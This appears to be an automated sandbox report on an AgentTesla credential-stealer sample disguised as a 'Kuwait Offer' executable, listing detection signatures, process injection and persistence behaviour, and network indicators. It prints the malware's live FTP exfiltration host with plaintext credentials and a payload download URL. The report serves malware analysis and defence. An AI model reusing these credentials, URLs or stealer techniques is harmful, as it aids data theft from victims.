Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Kuwait Offer48783929281-BZ2.exe

Overview

General Information

Sample name:Kuwait Offer48783929281-BZ2.exe
Analysis ID:1528672
MD5:b77b84072a85329568ea006b1b7f4201
SHA1:d9b623c149eeabf151684d852b7d0ab431712c42
SHA256:46044e8e01547f2456e27e8b15c667f004a2c26fd647f3cecc71de19015d96c0
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SGDT)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Kuwait Offer48783929281-BZ2.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe" MD5: B77B84072A85329568EA006B1B7F4201)
    • InstallUtil.exe (PID: 7612 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Hxfzsthbd.exe (PID: 7764 cmdline: "C:\Users\user\AppData\Roaming\Hxfzsthbd.exe" MD5: B77B84072A85329568EA006B1B7F4201)
    • InstallUtil.exe (PID: 7848 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Hxfzsthbd.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Roaming\Hxfzsthbd.exe" MD5: B77B84072A85329568EA006B1B7F4201)
    • InstallUtil.exe (PID: 7232 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000000.00000002.1366255411.0000000006440000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 44 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Kuwait Offer48783929281-BZ2.exe.6440000.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                3.2.Hxfzsthbd.exe.3600ce8.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  3.2.Hxfzsthbd.exe.3600ce8.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    3.2.Hxfzsthbd.exe.3600ce8.5.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x31261:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x312d3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x3135d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x313ef:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x31459:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x314cb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x31561:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x315f1:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    3.2.Hxfzsthbd.exe.3600ce8.5.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                    • 0x2e67c:$s2: GetPrivateProfileString
                    • 0x2dd9d:$s3: get_OSFullName
                    • 0x2f38e:$s5: remove_Key
                    • 0x2f56c:$s5: remove_Key
                    • 0x3047a:$s6: FtpWebRequest
                    • 0x31243:$s7: logins
                    • 0x317b5:$s7: logins
                    • 0x344ba:$s7: logins
                    • 0x34578:$s7: logins
                    • 0x35e7e:$s7: logins
                    • 0x3511c:$s9: 1.85 (Hash, version 2, native byte-order)
                    Click to see the 21 entries

                    System Summary

                    barindex
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe, ProcessId: 7480, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hxfzsthbd
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T08:56:03.760641+020020299271A Network Trojan was detected192.168.2.9497425.2.84.23621TCP
                    2024-10-08T08:56:16.368764+020020299271A Network Trojan was detected192.168.2.9498215.2.84.23621TCP
                    2024-10-08T08:56:25.599272+020020299271A Network Trojan was detected192.168.2.9498835.2.84.23621TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-08T08:56:04.458622+020028555421A Network Trojan was detected192.168.2.9497585.2.84.23655304TCP
                    2024-10-08T08:56:04.463815+020028555421A Network Trojan was detected192.168.2.9497585.2.84.23655304TCP
                    2024-10-08T08:56:17.062169+020028555421A Network Trojan was detected192.168.2.9498405.2.84.23651505TCP
                    2024-10-08T08:56:17.067407+020028555421A Network Trojan was detected192.168.2.9498405.2.84.23651505TCP
                    2024-10-08T08:56:26.305049+020028555421A Network Trojan was detected192.168.2.9498975.2.84.23662301TCP
                    2024-10-08T08:56:26.310354+020028555421A Network Trojan was detected192.168.2.9498975.2.84.23662301TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
                    Source: wymascensores.comVirustotal: Detection: 11%Perma Link
                    Source: https://wymascensores.com/dfsd/Wulwtq.mp310NWLLwEk5HVirustotal: Detection: 11%Perma Link
                    Source: https://wymascensores.com/dfsd/Wulwtq.mp3Virustotal: Detection: 11%Perma Link
                    Source: https://wymascensores.comVirustotal: Detection: 6%Perma Link
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeReversingLabs: Detection: 34%
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeVirustotal: Detection: 27%Perma Link
                    Source: Kuwait Offer48783929281-BZ2.exeReversingLabs: Detection: 34%
                    Source: Kuwait Offer48783929281-BZ2.exeVirustotal: Detection: 27%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeJoe Sandbox ML: detected
                    Source: Kuwait Offer48783929281-BZ2.exeJoe Sandbox ML: detected
                    Source: Kuwait Offer48783929281-BZ2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49800 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49856 version: TLS 1.2
                    Source: Kuwait Offer48783929281-BZ2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1366854084.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000034B9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000003015000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004175000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1366854084.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000034B9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003575000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000003015000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003BF3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_062E0260
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_062E0254
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 4x nop then jmp 06343A2Ch0_2_0634367E
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 4x nop then jmp 06343A2Ch0_2_06343680
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 4x nop then jmp 0634BD00h0_2_0634BC48
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 4x nop then jmp 06343E36h0_2_06343DE9
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_06620579
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_06620580
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 4x nop then jmp 066222D0h0_2_0662214F
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeCode function: 4x nop then jmp 066222D0h0_2_066221A0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_05730260
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h3_2_05730254
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05793E36h3_2_05793DE9
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 0579BD00h3_2_0579BC48
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05793A2Ch3_2_05793671
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05793A2Ch3_2_05793680
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05A70580
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h3_2_05A70579
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05A722D0h3_2_05A721A0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05A722D0h3_2_05A7214F
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h8_2_05C50254
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h8_2_05C50260
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05CB3E36h8_2_05CB3DE9
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05CBBD00h8_2_05CBBC48
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05CB3A2Ch8_2_05CB3680
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05CB3A2Ch8_2_05CB3673
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h8_2_05F90580
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h8_2_05F90579
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05F922D0h8_2_05F921A0
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 4x nop then jmp 05F922D0h8_2_05F9214F

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49758 -> 5.2.84.236:55304
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49742 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49821 -> 5.2.84.236:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49840 -> 5.2.84.236:51505
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.9:49897 -> 5.2.84.236:62301
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.9:49883 -> 5.2.84.236:21
                    Source: global trafficTCP traffic: 5.2.84.236 ports 62301,1,2,55304,21,51505
                    Source: global trafficTCP traffic: 192.168.2.9:49758 -> 5.2.84.236:55304
                    Source: global trafficHTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 67.212.175.162 67.212.175.162
                    Source: Joe Sandbox ViewIP Address: 5.2.84.236 5.2.84.236
                    Source: Joe Sandbox ViewASN Name: ALASTYRTR ALASTYRTR
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownFTP traffic detected: 5.2.84.236:21 -> 192.168.2.9:49742 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 09:56. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 100 allowed.220-Local time is now 09:56. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 10 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /dfsd/Wulwtq.mp3 HTTP/1.1Host: wymascensores.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: wymascensores.com
                    Source: global trafficDNS traffic detected: DNS query: ftp.alternatifplastik.com
                    Source: InstallUtil.exe, 00000002.00000002.1480659431.00000000025FC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1573523640.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2575392389.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.alternatifplastik.com
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.0000000003061000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Kuwait Offer48783929281-BZ2.exe, Hxfzsthbd.exe.0.drString found in binary or memory: https://github.com/mariuszgromada/MathParser.org-mXparser
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: Hxfzsthbd.exe.0.drString found in binary or memory: https://mathparser.org
                    Source: Kuwait Offer48783929281-BZ2.exe, Hxfzsthbd.exe.0.drString found in binary or memory: https://mathparser.org/mxparser-license
                    Source: Kuwait Offer48783929281-BZ2.exe, Hxfzsthbd.exe.0.drString found in binary or memory: https://mathparser.org/mxparser-tutorial/confirming-non-commercial-commercial-use
                    Source: Hxfzsthbd.exe.0.drString found in binary or memory: https://mathparser.org/order-commercial-license
                    Source: Hxfzsthbd.exe.0.drString found in binary or memory: https://payhip.com/infima
                    Source: Kuwait Offer48783929281-BZ2.exe, Hxfzsthbd.exe.0.drString found in binary or memory: https://payhip.com/infima)
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002A9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wymascensores.com/dfsd/Wulwtq.mp3
                    Source: Kuwait Offer48783929281-BZ2.exe, Hxfzsthbd.exe.0.drString found in binary or memory: https://wymascensores.com/dfsd/Wulwtq.mp310NWLLwEk5H
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                    Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49717 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49800 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.9:49856 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.Kuwait Offer48783929281-BZ2.exe.40d00c8.3.raw.unpack, SKTzxzsJw.cs.Net Code: RePIUNFdBeM

                    System Summary

                    barindex
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 3.2.Hxfzsthbd.exe.3600ce8.5.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
